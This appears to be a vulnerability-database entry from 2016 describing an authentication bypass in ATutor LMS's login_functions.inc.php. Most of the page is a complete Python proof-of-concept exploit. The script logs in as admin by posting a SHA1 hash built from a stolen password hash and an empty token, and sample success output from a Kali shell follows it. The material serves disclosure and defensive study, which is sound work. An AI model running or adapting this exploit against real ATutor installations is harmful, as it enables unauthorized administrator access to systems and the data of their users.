SRC-2016-0000 : ATutor LMS login_functions.inc.php Password Hash Usage Authentication Bypass Vulnerability

🗓️ 23 Feb 2016 00:00:00Reported by Steven Seeley of Source InciteType

ATutor LMS Authentication Bypass Vulnerability - Vulnerability in ATutor LMS allows remote attackers to bypass authentication without user interaction

#!/usr/bin/python
"""
root@kali:~# ./src-2016-0000.py
(+) usage: ./src-2016-0000.py(+) eg: ./src-2016-0000.py 172.16.175.221 56b11a0603c7b7b8b4f06918e1bb5378ccd481cc
root@kali:~# ./src-2016-0000.py target 56b11a0603c7b7b8b4f06918e1bb5378ccd481cc
(+) success!
"""

import sys
import hashlib
import requests

def gen_hash(passwd, token):
    m = hashlib.sha1()
    m.update(passwd + token)
    return m.hexdigest()

def we_can_login_with_a_hash():
    target = "http://%s/ATutor/login.php" % sys.argv[1]
    token = ""
    hashed = gen_hash(sys.argv[2], token)
    d = {
        "form_password_hidden" : hashed,
        "form_login": "admin",
        "submit": "Login",
        "token" : token
    }
    s = requests.Session()
    r = s.post(target, data=d)
    if "My Courses: My Start Page" in r.text:
        return True
    return False

def main():
    if len(sys.argv) != 3:
        print "(+) usage: %s" % sys.argv[0]
        print "(+) eg: %s 172.16.175.205 56b11a0603c7b7b8b4f06918e1bb5378ccd481cc" % sys.argv[0]
        sys.exit(-1)
    if we_can_login_with_a_hash():
        print "(+) success!"

if __name__ == "__main__":
    main()

06 Mar 2016 00:00Current

0.6Low risk

Vulners AI Score0.6